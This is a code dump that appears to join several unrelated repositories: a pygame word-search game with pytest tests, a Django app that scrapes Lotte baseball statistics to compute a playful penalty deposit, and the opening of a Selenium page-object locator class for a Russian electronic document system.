        On failure a fresh random word, position and direction are drawn
        and the attempt repeats until some placement succeeds; the placed
        word is recorded in self.usedWords.  Returns the mutated board.
        """
        if self.checkWord(word, x, y, dir, board):
            # print(word)
            self.usedWords.append(word)
            return self.fillWord(word, x, y, dir, board)
        else:
            word = random.choice(self.wordsList)
            locX = random.randint(0, self.size - 1)
            locY = random.randint(0, self.size - 1)
            direction = random.choice(self.directions)
            return self.addWord(word, locX, locY, direction, board)
    def generateGame(self):
        """Create a size x size board seeded with numberOfWords random words.

        Unfilled cells remain '-' placeholders at this stage; each word
        placement starts from a random word/position/direction and addWord
        retries until it fits.
        """
        board = np.zeros([self.size, self.size], dtype=str)
        # Fill the array with -'s as placeholders
        for row in range(0, self.size):
            for col in range(0, self.size):
                board[row][col] = "-"
        # Generate all words on the board
        for n in range(0, self.numberOfWords):
            word = random.choice(self.wordsList)
            locX = random.randint(0, self.size - 1)
            locY = random.randint(0, self.size - 1)
            direction = random.choice(self.directions)
            self.addWord(word, locX, locY, direction, board)
        return board
def checkSelection(self, board, selected):
selected.sort()
tempFor = ""
tempBack = ""
for i in selected:
row = i[1]
col = i[0]
if board[row][col] == "-":
return False
tempFor += (board[row][col])
for x in range(0, len(tempFor)):
tempBack += tempFor[len(tempFor)-x-1]
if tempFor in self.usedWords:
return tempFor
elif tempBack in self.usedWords:
return tempBack
else:
return ""
def clearSelection(self, selected):
selected.clear()
def playGame(self):
    """Run the interactive word-search game loop (pygame).

    Blocks until the player quits the window or clicks "BACK TO MENU".
    Reads/writes the best completion time in ``ws_high_score.txt``
    (two lines: minutes, then seconds).
    """
    # `a` is the display board (placeholders get replaced with random
    # filler letters while drawing); `board` keeps a pristine copy used
    # for word checking.
    a = self.generateGame()
    board = copy.deepcopy(a)
    score_file = open("ws_high_score.txt", "r")
    score = score_file.read().splitlines() # read in the best time/high score
    score_file.close()
    # Pygame initializations
    pygame.init()
    pygame.display.set_caption('Word Search Game')
    scale = 40            # pixel size of one grid cell
    width = 17 * scale
    height = 24 * scale
    twice = scale * 2     # NOTE(review): unused below
    half = scale // 2
    halfW = width // 2
    quarterW = width // 4
    eighthW = width // 8
    running = True
    leftDrag = False      # left button held: select letters while moving
    rightDrag = False     # right button held: deselect letters while moving
    win = False
    frames = 0
    minutes = 0
    seconds = 0
    total_seconds = 0
    screen = pygame.display.set_mode((width, height))
    clock = pygame.time.Clock()
    font = pygame.font.SysFont("consola", 32)
    small_font = pygame.font.SysFont("consola", 28)
    # Colors
    white = (255, 255, 255)
    grey = (200, 200, 200)
    dark_grey = (175, 175, 175)
    black = (0, 0, 0)
    light_red = (255, 175, 175)
    dark_red = (230, 150, 150)
    light_orange = (255, 200, 145)
    light_yellow = (255, 255, 200)
    light_green = (200, 255, 200)
    light_blue = (200, 200, 255)
    dark_blue = (175, 175, 230)
    light_purple = (255, 175, 255)
    light_pink = (255, 200, 200)
    light_brown = (200, 150, 100)
    # Default colors
    letter_color = white
    word_color = white
    check_color = grey
    clear_color = light_blue
    new_color = light_red
    # Selection variables
    selX = -1
    selY = -1
    selected = []         # (col, row) cells currently highlighted
    correct = []          # words already found
    correctLetters = []   # cells that belong to found words
    while running:
        # Variables for calculating time
        if not win:
            # Timer assumes the loop runs at 60 FPS (clock.tick(60) below);
            # it freezes once the puzzle is complete.
            total_seconds = frames // 60
            minutes = total_seconds // 60
            seconds = total_seconds % 60
            time = "{0:02}:{1:02}".format(minutes, seconds)
        # Actions/events from input
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
                # NOTE(review): quitting pygame here while the rest of this
                # frame still draws may raise "video system not initialized"
                # — confirm intended shutdown order.
                pygame.quit()
            # Events related to left click mouse down
            elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
                # User clicks the mouse. Get the position
                pos = pygame.mouse.get_pos()
                # Change the x/y screen coordinates to grid coordinates
                column = pos[0] // scale
                row = (pos[1] - scale) // scale
                # Action for letters being selected
                if (column < self.size and column >= 0) and (row < self.size and row >= 0) and not win:
                    leftDrag = True
                    selX = column
                    selY = row
                    if (selX, selY) not in selected:
                        selected.append((selX, selY))
                # Action for check word buttton pressed
                if (pos[0] < quarterW and pos[0] >= 0) and (pos[1] < scale and pos[1] >= 0) and not win:
                    check_color = dark_grey
                    # NOTE(review): checkSelection is evaluated twice per
                    # click; both calls return the same word for the same
                    # selection, so behavior is unaffected, just redundant.
                    if self.checkSelection(board, selected):
                        correct.append(self.checkSelection(board, selected))
                        for things in selected:
                            correctLetters.append(things)
                    self.clearSelection(selected)
                # Action for clear word buttton pressed
                if (pos[0] < halfW and pos[0] >= quarterW) and (pos[1] < scale and pos[1] >= 0) and not win:
                    clear_color = dark_blue
                    self.clearSelection(selected)
                # Action for new game button; resets all variables, game board, etc.
                if (pos[0] < quarterW * 3 and pos[0] >= halfW) and (pos[1] < scale and pos[1] >= 0):
                    win = False
                    score_file = open("ws_high_score.txt", "r")
                    score = score_file.read().splitlines() # read in the best time/high score
                    score_file.close()
                    self.usedWords = []
                    a = self.generateGame()
                    board = copy.deepcopy(a)
                    frames = 0
                    minutes = 0
                    seconds = 0
                    total_seconds = 0
                    selected = []
                    correct = []
                    correctLetters = []
                    new_color = dark_red
                # Action for back to menu button
                if (pos[0] < width and pos[0] >= 0) and (pos[1] < height and pos[1] >= 23 * scale):
                    running = False
            # Events related to left click mouse up
            elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:
                leftDrag = False
            # Events related to mouse drag/motion
            elif event.type == pygame.MOUSEMOTION and leftDrag:
                pos = pygame.mouse.get_pos()
                # Change the x/y screen coordinates to grid coordinates
                column = pos[0] // scale
                row = (pos[1] - scale) // scale
                # NOTE(review): unlike the click handler, no bounds check
                # here — dragging outside the grid can append out-of-range
                # cells to `selected`; confirm whether that can reach
                # checkSelection's board indexing.
                if (column, row) not in selected:
                    selected.append((column, row))
            # Events related to right click mouse down
            elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 3:
                # User clicks the mouse. Get the position
                pos = pygame.mouse.get_pos()
                # Change the x/y screen coordinates to grid coordinates
                column = pos[0] // scale
                row = (pos[1] - scale) // scale
                # Action for letters being selected
                if (column < self.size and column >= 0) and (row < self.size and row >= 0):
                    rightDrag = True
                    selX = column
                    selY = row
                    if (selX, selY) in selected:
                        selected.remove((selX, selY))
            # Events related to right click mouse up
            elif event.type == pygame.MOUSEBUTTONUP and event.button == 3:
                rightDrag = False
            # Events related to mouse drag/motion
            elif event.type == pygame.MOUSEMOTION and rightDrag:
                pos = pygame.mouse.get_pos()
                # Change the x/y screen coordinates to grid coordinates
                column = pos[0] // scale
                row = (pos[1] - scale) // scale
                if (column, row) in selected:
                    selected.remove((column, row))
            # Visual change for buttons being clicked
            else:
                check_color = grey
                clear_color = light_blue
                new_color = light_red
        pygame.display.update()
        frames += 1
        clock.tick(60)
        # Displaying everything on the screen
        screen.fill(white)
        # Takes the numpy array and puts it into a grid of labels
        for row in range(0, self.size):
            for col in range(0, self.size):
                if (col, row) in selected:
                    letter_color = light_yellow
                elif (col, row) in correctLetters:
                    letter_color = light_green
                else:
                    letter_color = white
                # Lazily replace placeholders with random filler letters so
                # `board` (the checking copy) keeps the real word layout.
                if a[row][col] == "-":
                    a[row][col] = random.choice(self.letters)
                letter = font.render(a[row][col], True, black, letter_color)
                letterRect = letter.get_rect()
                letterRect.center = (col * scale + half, row * scale + (scale + half))
                pygame.draw.rect(screen, letter_color, [scale * col, scale * row + scale, scale, scale])
                screen.blit(letter, letterRect)
        # Display all the words at the bottom of the screen
        for i in range(0, self.numberOfWords):
            col = i % 5
            row = i // 5
            if self.usedWords[i] in correct:
                word_color = light_green
            else:
                word_color = white
            fifth = width // 5
            centerFifth = fifth // 2
            half = scale // 2
            word = small_font.render(self.usedWords[i], True, black, word_color)
            wordRect = word.get_rect()
            wordRect.center = (col * fifth + centerFifth, (row * scale + half) + (18 * scale))
            pygame.draw.rect(screen, word_color, [fifth * col, (scale * row) + (18 * scale), fifth, scale])
            screen.blit(word, wordRect)
        # Check word and clear buttons
        check = small_font.render("CHECK WORD", True, black, check_color)
        checkRect = check.get_rect()
        checkRect.center = (eighthW, half)
        pygame.draw.rect(screen, check_color, [0, 0, quarterW, scale])
        screen.blit(check, checkRect)
        clear = small_font.render("CLEAR", True, black, clear_color)
        clearRect = clear.get_rect()
        clearRect.center = (3 * (eighthW), half)
        pygame.draw.rect(screen, clear_color, [quarterW, 0, halfW, scale])
        screen.blit(clear, clearRect)
        # New game button and timer
        new = small_font.render("NEW GAME", True, black, new_color)
        newRect = new.get_rect()
        newRect.center = (5 * (eighthW), half)
        pygame.draw.rect(screen, new_color, [halfW, 0, quarterW * 3, scale])
        screen.blit(new, newRect)
        timer = small_font.render(time, True, black, light_orange)
        timerRect = timer.get_rect()
        timerRect.center = (7 * (eighthW), half)
        pygame.draw.rect(screen, light_orange, [quarterW * 3, 0, width, scale])
        screen.blit(timer, timerRect)
        # Back to menu button
        menu = small_font.render("BACK TO MENU", True, black, light_purple)
        menuRect = menu.get_rect()
        menuRect.center = (width // 2, (23 * scale) + (scale // 2))
        pygame.draw.rect(screen, light_purple, [0, 23 * scale, width, scale])
        screen.blit(menu, menuRect)
        # Win condition
        if len(correct) == self.numberOfWords:
            win = True
            text = "{0:02}:{1:02}".format(int(score[0]), int(score[1]))
            # Persist a new best time when the current run beats the stored one.
            if int(score[0]) > minutes or (int(score[0]) >= minutes and int(score[1]) > seconds):
                with open("ws_high_score.txt", "w") as out:
                    out.write("{}\n{}".format(str(minutes), str(seconds)))
                text = "{0:02}:{1:02}".format(minutes, seconds)
            # NOTE(review): score_file was already closed above; closing a
            # closed file object is a no-op, so this line is redundant.
            score_file.close()
            complete = font.render("Puzzle complete! Best time: " + text, True, black, light_orange)
            completeRect = complete.get_rect()
            completeRect.center = (width // 2, (23 * scale) + (scale // 2))
            pygame.draw.rect(screen, light_orange, [0, 23 * scale, width, height])
            screen.blit(complete, completeRect)
            frames += 1
            clock.tick(60)
            pygame.display.update()
    #pygame.quit()
# test = WordSearch()
# test.playGame()
--- FILE SEPARATOR ---
# Test suite for word search game
import pytest
import numpy as np
import word_search
@pytest.fixture
def getWS():
    """Fixture: a fresh word_search.WordSearch instance for each test."""
    return word_search.WordSearch()
# Arrange, get a blank board
@pytest.fixture
def getBoard(getWS):
    """Fixture: a size x size numpy grid pre-filled with "-" placeholders,
    matching the blank board generateGame starts from."""
    side = getWS.size
    return np.full((side, side), "-", dtype=str)
def test_printClass(getWS):
    """printClass must return its fixed descriptive string."""
    expected = "This is the word search class."
    assert getWS.printClass() == expected
def test_checkWord(getWS, getBoard):
    """A short word heading east from the origin of a blank board must fit."""
    assert getWS.checkWord("test", 0, 0, "E", getBoard)
def test_fillWord(getWS, getBoard):
    """fillWord heading east must write one letter per cell along x."""
    word = "test"
    result = getWS.fillWord(word, 0, 0, "E", getBoard)
    expected = getBoard
    for offset, letter in enumerate(word):
        expected[offset][0] = letter
    assert np.array_equal(result, expected)
def test_addWord(getWS, getBoard):
    """addWord on a fitting spot must place the word just like fillWord."""
    word = "test"
    result = getWS.addWord(word, 0, 0, "E", getBoard)
    expected = getBoard
    for offset, letter in enumerate(word):
        expected[offset][0] = letter
    assert np.array_equal(result, expected)
def test_generateGame(getWS, getBoard):
    """generateGame must actually alter the blank board by placing words.

    The previous per-cell assertion used ``is not``; numpy indexing returns
    a fresh scalar object on every access, so that identity check could
    never fail.  Compare array content instead.
    """
    result = getWS.generateGame()
    blank = getBoard
    assert result.shape == blank.shape
    # At least one cell must now hold a word letter instead of "-".
    assert not np.array_equal(result, blank)
|
[
"/chess.py",
"/chess_test.py",
"/menu.py",
"/minesweeper.py",
"/minesweeper_test.py",
"/setup.py",
"/sudoku.py",
"/sudoku_test.py",
"/word_search.py",
"/word_search_test.py"
] |
01-2/lotte_error_deposit
|
import pandas as pd
import datetime
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "lotte_error_deposit.settings")
import django
django.setup()
from parsed_total_data.models import TotalData, SeasonData
'''
SO(Strike Outs/500) & DP(Double Plays/1000) : http://www.statiz.co.kr/stat.php?re=0&lr=5
HR(Home Run/1000) & BK(Balk/3000) & PB(Passed Balls/5000) : http://www.statiz.co.kr/stat.php?re=1&lr=5
E(Error/10000) : http://www.statiz.co.kr/stat.php?re=2&lr=5
'''
def calc_money(stkOut, dbplay, homerun, balk, passedBall, error):
    """Convert mistake-event counts into a deposit amount (KRW).

    Rates per event: strikeout 500, double play 1,000, home run allowed
    1,000, balk 3,000, passedBall 5,000, fielding error 10,000.
    """
    counts = (stkOut, dbplay, homerun, balk, passedBall, error)
    rates = (500, 1000, 1000, 3000, 5000, 10000)
    return sum(count * rate for count, rate in zip(counts, rates))
def get_data():
    """Scrape statiz.co.kr team tables and return 롯데's mistake counts.

    Returns a dict of single-row pandas Series keyed by stat name:
    ``stkOut``, ``dbplay``, ``homerun``, ``balk``, ``passedBall``,
    ``error``.  Performs three HTTP requests via ``pd.read_html``.
    """

    def _tidy(df):
        # Each scraped table carries 4 junk header rows and a multi-level
        # column index; keep index level 2 as the column name and drop the
        # auto-generated "Unnamed" columns.  (This logic was previously
        # copy-pasted three times.)
        df = df.drop(df.index[0:4])
        df.columns = [col[2] for col in df.columns.values]
        return df.loc[:, ~df.columns.str.contains('^Unnamed')]

    df_bat = _tidy(pd.read_html('http://www.statiz.co.kr/stat.php?re=0&lr=5')[0])
    df_pit = _tidy(pd.read_html('http://www.statiz.co.kr/stat.php?re=1&lr=5')[0])
    df_def = _tidy(pd.read_html('http://www.statiz.co.kr/stat.php?re=2&lr=5')[0])

    # Keep only the 롯데 (Lotte) rows from each table.
    bat_lotte = df_bat[df_bat['이름'].isin(['롯데'])]
    pit_lotte = df_pit[df_pit['이름'].isin(['롯데'])]
    def_lotte = df_def[df_def['이름'].isin(['롯데'])]
    print(bat_lotte)
    print(pit_lotte)
    print(def_lotte)

    so_num = bat_lotte['삼진'].astype(int)
    dp_num = bat_lotte['병살'].astype(int)
    print('삼진 : {0} / 병살 : {1}'.format(so_num.values, dp_num.values))

    hr_num = pit_lotte['홈런'].astype(int)
    bk_num = pit_lotte['보크'].astype(int)
    # NOTE(review): the '폭투' column is wild pitches, but it feeds the
    # passedBall field downstream — confirm which stat is intended.
    pb_num = pit_lotte['폭투'].astype(int)
    print('피홈런 : {0} / 보크 : {1} / 폭투 : {2}'.format(hr_num.values, bk_num.values, pb_num.values))

    e_num = def_lotte['실책'].astype(int)
    print('실책 : {0}'.format(e_num.values))

    return {'stkOut': so_num,
            'dbplay': dp_num,
            'homerun': hr_num,
            'balk': bk_num,
            'passedBall': pb_num,
            'error': e_num}
if __name__ == '__main__':
    # Season totals stored on the last run, and today's scraped totals.
    season_data = SeasonData.objects.last()
    total_data = get_data()
    if season_data is not None:
        # Daily deltas = today's season totals minus the stored totals.
        # NOTE(review): total_data values are single-row pandas Series;
        # int(Series) relies on the one-element conversion — confirm it is
        # still supported by the pandas version in use.
        diff_stkOut = int(total_data['stkOut']) - (getattr(season_data, 'stkOut'))
        diff_dbplay = int(total_data['dbplay']) - (getattr(season_data, 'dbplay'))
        diff_homerun = int(total_data['homerun']) - (getattr(season_data, 'homerun'))
        diff_balk = int(total_data['balk']) - (getattr(season_data, 'balk'))
        diff_passedBall = int(total_data['passedBall']) - (getattr(season_data, 'passedBall'))
        diff_error = int(total_data['error']) - (getattr(season_data, 'error'))
        print(diff_stkOut)
        # TODO: only save on days when a mistake actually occurred
        TotalData(date=datetime.date.today(),
                  stkOut=diff_stkOut,
                  dbplay=diff_dbplay,
                  homerun=diff_homerun,
                  balk=diff_balk,
                  passedBall=diff_passedBall,
                  error=diff_error,
                  money=calc_money(diff_stkOut, diff_dbplay,
                                   diff_homerun, diff_balk,
                                   diff_passedBall, diff_error)).save()
        # NOTE(review): SeasonData.date stores a year (int), so comparing it
        # to datetime.date.today() is always False — confirm whether
        # `.year` was intended here.
        if getattr(season_data, 'date') == datetime.date.today():
            # BUG FIX: Manager objects have no .delete(); deletion must go
            # through a QuerySet (objects.all().delete()).
            SeasonData.objects.all().delete()
    # Always store today's season snapshot; .last() picks it up next run.
    SeasonData(date=datetime.date.today().year,
               stkOut=total_data['stkOut'],
               dbplay=total_data['dbplay'],
               homerun=total_data['homerun'],
               balk=total_data['balk'],
               passedBall=total_data['passedBall'],
               error=total_data['error'],
               money=calc_money(int(total_data['stkOut']),
                                int(total_data['dbplay']),
                                int(total_data['homerun']),
                                int(total_data['balk']),
                                int(total_data['passedBall']),
                                int(total_data['error']))
               ).save()
--- FILE SEPARATOR ---
from django.apps import AppConfig
class DispdepositConfig(AppConfig):
    """Django app configuration for the deposit-display app."""
    # Dotted path / label used in INSTALLED_APPS.
    name = 'dispDeposit'
--- FILE SEPARATOR ---
from django.shortcuts import render
from parsed_total_data.models import TotalData, SeasonData
def calc_money(stkOut, dbplay, homerun, balk, passedBall, error):
    """Total penalty deposit (KRW) for the given mistake-event counts."""
    money = stkOut * 500
    money += dbplay * 1000
    money += homerun * 1000
    money += balk * 3000
    money += passedBall * 5000
    money += error * 10000
    return money
# Create your views here.
def index(request):
    """Render the landing page with the latest season snapshot and the
    comma-formatted deposit total derived from its counters."""
    season = SeasonData.objects.last()
    deposit = calc_money(season.stkOut, season.dbplay,
                         season.homerun, season.balk,
                         season.passedBall, season.error)
    formatted = str(format(deposit, ","))
    print(formatted)  # console debug trace
    return render(request, 'index.html',
                  {'total_data': season, 'total_money': formatted})
def history(request):
    """Render the per-day deposit history alongside the season summary."""
    context = {
        'history': TotalData.objects.all(),
        'season': SeasonData.objects.last(),
    }
    return render(request, 'history.html', context)
def patch_note(request):
    """Render the static patch-notes page."""
    template = 'patch_note.html'
    return render(request, template)
def contact(request):
    """Render the static contact page."""
    template = 'contact.html'
    return render(request, template)
--- FILE SEPARATOR ---
from django.contrib import admin
from .models import TotalData, SeasonData
# Register your models here.
# Expose both models in the Django admin with the default ModelAdmin.
admin.site.register(TotalData)
admin.site.register(SeasonData)
--- FILE SEPARATOR ---
from django.apps import AppConfig
class ParsedTotalDataConfig(AppConfig):
    """Django app configuration for the scraped-stats app."""
    # Dotted path / label used in INSTALLED_APPS.
    name = 'parsed_total_data'
--- FILE SEPARATOR ---
# Generated by Django 2.2.7 on 2019-11-25 13:19
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the TotalData table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='TotalData',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.DateField()),
                ('stkOut', models.PositiveIntegerField()),
                ('dbplay', models.PositiveIntegerField()),
                ('homerun', models.PositiveIntegerField()),
                ('balk', models.PositiveIntegerField()),
                ('wildPitch', models.PositiveIntegerField()),
                ('mistake', models.PositiveIntegerField()),
            ],
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 2.2.7 on 2019-11-25 14:04
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: renames mistake -> error and wildPitch -> passedBall."""

    dependencies = [
        ('parsed_total_data', '0001_initial'),
    ]

    operations = [
        migrations.RenameField(
            model_name='totaldata',
            old_name='mistake',
            new_name='error',
        ),
        migrations.RenameField(
            model_name='totaldata',
            old_name='wildPitch',
            new_name='passedBall',
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 2.2.7 on 2019-11-25 14:56
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: adds the (later removed) totalMoney field."""

    dependencies = [
        ('parsed_total_data', '0002_auto_20191125_1404'),
    ]

    operations = [
        migrations.AddField(
            model_name='totaldata',
            name='totalMoney',
            field=models.PositiveIntegerField(default=0),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 2.2.7 on 2019-11-25 15:11
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: drops totalMoney (superseded by `money` in 0005)."""

    dependencies = [
        ('parsed_total_data', '0003_totaldata_totalmoney'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='totaldata',
            name='totalMoney',
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 2.2.7 on 2019-11-26 13:45
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: adds the nullable `money` field to TotalData."""

    dependencies = [
        ('parsed_total_data', '0004_remove_totaldata_totalmoney'),
    ]

    operations = [
        migrations.AddField(
            model_name='totaldata',
            name='money',
            field=models.PositiveIntegerField(null=True),
        ),
    ]
--- FILE SEPARATOR ---
from django.db import models
# Create your models here.
class TotalData(models.Model):
    """One day's delta of mistake events and the deposit charged for them."""
    date = models.DateField()                       # day the deltas were recorded
    stkOut = models.PositiveIntegerField()          # strikeouts
    dbplay = models.PositiveIntegerField()          # double plays
    homerun = models.PositiveIntegerField()         # home runs allowed
    balk = models.PositiveIntegerField()            # balks
    passedBall = models.PositiveIntegerField()      # fed from the '폭투' (wild pitch) scrape — confirm naming
    error = models.PositiveIntegerField()           # fielding errors
    money = models.PositiveIntegerField(null=True)  # computed deposit (KRW); nullable for pre-0005 rows

    def __str__(self):
        # Rows are identified by their date in the admin.
        return str(self.date)
class SeasonData(models.Model):
    """Season-to-date totals snapshot used to compute daily deltas."""
    date = models.PositiveIntegerField()            # season year (crawler stores date.today().year)
    stkOut = models.PositiveIntegerField()          # strikeouts
    dbplay = models.PositiveIntegerField()          # double plays
    homerun = models.PositiveIntegerField()         # home runs allowed
    balk = models.PositiveIntegerField()            # balks
    passedBall = models.PositiveIntegerField()      # fed from the '폭투' (wild pitch) scrape — confirm naming
    error = models.PositiveIntegerField()           # fielding errors
    money = models.PositiveIntegerField(null=True)  # computed deposit (KRW)

    def __str__(self):
        # Rows are identified by their season year in the admin.
        return str(self.date)
--- FILE SEPARATOR ---
from django.contrib import admin
from patch_board.models import patchBoard
# Register your models here.
# Expose the patch-note board model in the Django admin.
admin.site.register(patchBoard)
--- FILE SEPARATOR ---
from django.apps import AppConfig
class PatchBoardConfig(AppConfig):
    """Django app configuration for the patch-note board app."""
    # Dotted path / label used in INSTALLED_APPS.
    name = 'patch_board'
--- FILE SEPARATOR ---
from django.db import models
from ckeditor_uploader.fields import RichTextUploadingField
# Create your models here.
class patchBoard(models.Model):
    """Patch-note board entry with a CKEditor rich-text body.

    NOTE(review): the lowercase class name breaks PEP 8 (PascalCase) but is
    referenced by the admin registration, so it is left as-is.
    """
    subject = models.CharField(max_length=50, blank=True)        # post title
    name = models.CharField(max_length=50, blank=True)           # author name
    created_date = models.DateField(null=True, blank=True)       # posting date
    memo = models.CharField(max_length=1000, blank=True)         # short plain-text note
    hits = models.PositiveIntegerField(null=True, blank=True)    # presumably a view counter — confirm against the views
    description = RichTextUploadingField(null=True, blank=True)  # rich-text body (supports uploads)
|
[
"/crawl_total_stats.py",
"/dispDeposit/apps.py",
"/dispDeposit/views.py",
"/parsed_total_data/admin.py",
"/parsed_total_data/apps.py",
"/parsed_total_data/migrations/0001_initial.py",
"/parsed_total_data/migrations/0002_auto_20191125_1404.py",
"/parsed_total_data/migrations/0003_totaldata_totalmoney.py",
"/parsed_total_data/migrations/0004_remove_totaldata_totalmoney.py",
"/parsed_total_data/migrations/0005_totaldata_money.py",
"/parsed_total_data/models.py",
"/patch_board/admin.py",
"/patch_board/apps.py",
"/patch_board/models.py"
] |
0100101001/PyTestKSED
|
from page_objects import PageObject, PageElement, MultiPageElement
from KSED.TestData.locators import KSEDLocators
class Locator(PageObject, KSEDLocators):
# Форма авторизации
username_text = PageElement(name=KSEDLocators.username_text) # Логин
password_text = PageElement(name=KSEDLocators.password_text) # Пароль
LogIn_button = PageElement(xpath=KSEDLocators.LogIn_button) # Кнопка "Войти"
# *******СТРОКА МЕНЮ*******
ksed = PageElement(xpath=KSEDLocators.ksed) #xpath # КСЭД
barcode_search = PageElement(id_=KSEDLocators.barcode_search) #id # Поиск по ШК
search_bc = PageElement(xpath=KSEDLocators.search_bc) # Строка поиска по ШК
more_menu = PageElement(id_=KSEDLocators.more_menu)# Меню "Ещё"
ksed_in_more_m = PageElement(id_=KSEDLocators.ksed_in_more_m) # КСЭД в меню "Ещё"
Company_dir = PageElement(xpath=KSEDLocators.Company_dir) # Справочник организации
admin = PageElement(xpath=KSEDLocators.admin) # Администрирование
transfer = PageElement(xpath=KSEDLocators.transfer) # Передача дел
arm_arh = PageElement(xpath=KSEDLocators.arm_arh) # АРМ Архивное дело
verify = PageElement(xpath=KSEDLocators.verify) # Верификация
scanner = PageElement(xpath=KSEDLocators.scanner) # Работа со сканером ШК
notification = PageElement(id_=KSEDLocators.notification) # Уведомления
notificationProtokol = PageElement(xpath=KSEDLocators.notificationProtokol) # Первое в списке уведомление о протоколе
notificationFirst = PageElement(xpath=KSEDLocators.notificationFirst) # id # Уведомление первое в списке
# *******МЕНЮ ПОЛЬЗОВАТЕЛЯ*******
user_menu = PageElement(id_=KSEDLocators.user_menu) # Меню пользователя
USER_LOGOUT = PageElement(id_=KSEDLocators.USER_LOGOUT) # Выход из системы
my_profile = PageElement(xpath=KSEDLocators.my_profile) # Пункт меню "Мой профиль"
fieldlabel = PageElement(xpath=KSEDLocators.fieldlabel) # Должность в области краткой информации
btnEdit_profile = PageElement(xpath=KSEDLocators.btnEdit_profile) # Кнопка "Изменить профиль"
inputPosition = PageElement(xpath=KSEDLocators.inputPosition) # Поле ввода должности
logic_ESM = PageElement(xpath=KSEDLocators.logic_ESM) # Пункт меню "Логика ECM. Мой профиль"
autoAnswerText = PageElement(name=KSEDLocators.autoAnswerText) # Текст автоответа (Меня нет в офисе)
btnCancelAbsence = PageElement(xpath=KSEDLocators.btnCancelAbsence) # Кнопка "Отменить отсутствие"
btnYes = PageElement(xpath=KSEDLocators.btnYes) # Кнопка "Да" (отменить отсутствие)
edit_password = PageElement(xpath=KSEDLocators.edit_password) # Пункт меню "Изменить пароль"
inputOldPassword = PageElement(xpath=KSEDLocators.inputOldPassword) # Введите старый пароль
inputNewPassword1 = PageElement(xpath=KSEDLocators.inputNewPassword1) # Введите старый пароль
inputNewPassword2 = PageElement(xpath=KSEDLocators.inputNewPassword2) # Введите старый пароль
btnOKchange = PageElement(xpath=KSEDLocators.btnOKchange) # Кнопка "Изменить пароль"
# *******ЛЕВАЯ ЧАСТЬ СТРАНИЦЫ (Кнопка "Создать" и разделы)*******
newDoc_button = PageElement(xpath=KSEDLocators.newDoc_button) # "Создать"
protocol = PageElement(xpath=KSEDLocators.protocol) # Протокол
rd = PageElement(xpath=KSEDLocators.rd) # РД
reestr = PageElement(xpath=KSEDLocators.reestr) # Реестр
poruchenie = PageElement(xpath=KSEDLocators.poruchenie) # Поручение
resolution = PageElement(xpath=KSEDLocators.resolution) # Резолюция
SZ = PageElement(xpath=KSEDLocators.SZ) # Служебная записка
proizvDoc = PageElement(xpath=KSEDLocators.proizvDoc) # Произвольный документ
paket_vh = PageElement(xpath=KSEDLocators.paket_vh) #Пакет Вх. кор.
vhDoc = PageElement(xpath=KSEDLocators.vhDoc) # Входящий документ
ishDoc = PageElement(xpath=KSEDLocators.ishDoc) # Исходящий документ
# РАЗДЕЛЫ
myWork = PageElement(xpath=KSEDLocators.myWork) # Моя работа
expedition = PageElement(xpath=KSEDLocators.expedition) # Экспедиция
navigation = PageElement(xpath=KSEDLocators.navigation) # Навигатор
allur = PageElement(xpath=KSEDLocators.allur) # Отчеты
workReg = PageElement(xpath=KSEDLocators.workReg) # Работа регистратора
medo = PageElement(xpath=KSEDLocators.medo) # МЭДО
mySearch = PageElement(xpath=KSEDLocators.mySearch) # Мои поисковые запросы
poiskzapr = PageElement(xpath=KSEDLocators.poiskzapr) # Поисковые запросы
myPoiskZapr = PageElement(xpath=KSEDLocators.myPoiskZapr) # Поисковые запросы
ControlZapr = PageElement(xpath=KSEDLocators.ControlZapr) # Упарвление поисковыми запросами
# ОБЛАСТЬ ПРОСМОТРА (КСЭД)
oblProsm = PageElement(xpath=KSEDLocators.oblProsm) # Область просмотра
oneDocInList = PageElement(xpath=KSEDLocators.oneDocInList) # Первый документ в списке
nineDocInList = PageElement(xpath=KSEDLocators.nineDocInList) # Девятый документ в списке
subordinate = MultiPageElement(xpath=KSEDLocators.subordinate) # "+" раскрытие подчиненные документы
oneSubordInList = PageElement(xpath=KSEDLocators.oneSubordInList) # Первая ссылка на подчиненный документ
ActionTab = PageElement(xpath=KSEDLocators.ActionTab) # Кнопка "Действия с выбранными"
chBinOnl = PageElement(xpath=KSEDLocators.chBinOnl)
# Моя работа
WorkImmid = PageElement(xpath=KSEDLocators.WorkImmid) # xpath # Моя работа - срочные
connectedDoc = PageElement(xpath=KSEDLocators.connectedDoc) # xpath # связанные документы
# ОТЧЕТЫ
section_allur = PageElement(xpath=KSEDLocators.section_allur) # Раздел "Отчеты"
node_Logs = PageElement(xpath=KSEDLocators.node_Logs) # "Журналы"
node_Statis = PageElement(xpath=KSEDLocators.node_Statis) # "Статистические отчеты"
edsBykindStat = PageElement(xpath=KSEDLocators.edsBykindStat) # Отчет "Сводка по видам документов"
node_ispDisp = PageElement(xpath=KSEDLocators.node_ispDisp) #
logs_incDoc = PageElement(xpath=KSEDLocators.logs_incDoc)
incomingRegJournal = PageElement(xpath=KSEDLocators.incomingRegJournal) # Отчет "Журнал регистрации входящих документов"
logs_outDoc = PageElement(xpath=KSEDLocators.logs_outDoc)
outgoingRegistration = PageElement(xpath=KSEDLocators.outgoingRegistration) # Отчет "Журнал регистрации исходящих документов"
logs_raspDoc = PageElement(xpath=KSEDLocators.logs_raspDoc)
ordRegJournal = PageElement(xpath=KSEDLocators.ordRegJournal) # Отчет "Журнал регистрации Распорядительных документов"
logs_sluDoc = PageElement(xpath=KSEDLocators.logs_sluDoc)
